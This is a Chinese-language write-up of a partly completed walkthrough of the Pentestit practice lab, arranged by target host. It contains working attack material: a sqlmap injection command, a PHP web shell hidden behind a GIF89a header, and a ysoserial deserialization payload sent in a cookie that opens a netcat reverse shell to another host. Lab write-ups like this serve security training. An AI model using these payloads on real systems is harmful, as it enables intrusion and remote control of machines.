一直挣扎与叹气的一个月,最后还是没有完成.只能留着以后有机会再弄吧…
地址:
href=”https://lab.pentestit.ru/pentestlabs/5”
环境示意图:
0x01(mainsite&&bypass)
nmap 扫描gw(192.168.101.8)的开放端口及其服务.
set rhosts 192.168.101.8
set TLS_VERSION 1.2
set verbose true
sqlmap -u "http://cybear32c.lab/wp-content/plugins/wp-symposium/get_album_item.php?size=1" --dbs --dbms mysql --proxy="http://192.168.101.8:3128" --suffix=" -- " --proxy-cred="b.muncy:xxxxx"
0x02(ssh)
ssh连接.
0x03(ftp)
扫描172.16.0.4.
0x04(cisco)
首先留意问/home下有一个cisco_upload的文件,可能之后会用到.进入之后发现有一个router-confg.old文件,查发现有密码在里面.
0x05(Photo)
用nmap进行扫描.发现80端口.
GIF89a
<?php
echo "<pre>";
system($_GET['cmd']);
echo "</pre>";
?>
再根据扫描得出目录.
0x06(NAS)
使用nmap扫描192.168.0.3.
0x07(termianl2)
namp扫描192.168.3.2.
0x08(mail)
回到gw的子网内.nmap的扫描结果给定了一个80端口.
0x09(dev)
发现无法重新远程连接上192.168.3.2,所以无法继续… Youtube有教程自己可以查看…
0x10(portal)
使用nmap扫描192.168.1.2.
git https://github.com/frohoff/ysoserial
cd ysoserial
mvn compile
mvn package -DskipTests
就能在target下找到已经打包好的0.0.5.使用如下命令.
curl -b 'userInfo="'$(java -jar ysoserial-0.0.5-SNAPSHOT-all.jar CommonsCollections5 'nc -e /bin/sh 172.16.0.2 1235' | base64 | tr -d '\n')'"' 'http://127.0.0.1:8080/index.jsp'
再次尝试反弹shell.成功并且拿到token.
0x11(site-test)
直接将端口转发到本地的80端口上.
0x12(ssh-test)
已经知道了是ssh的knock,但是不管是使用脚本敲门,还是konock敲门,都不能把22端口打开.并且扫描也扫不出端口…(就扫出过一次…)
0x13(termianl)
这个….并没有做出根据writeup需要安装的是要在x86的环境下的payload…
如果已经解决了我的问题的人,求交流一下…^_^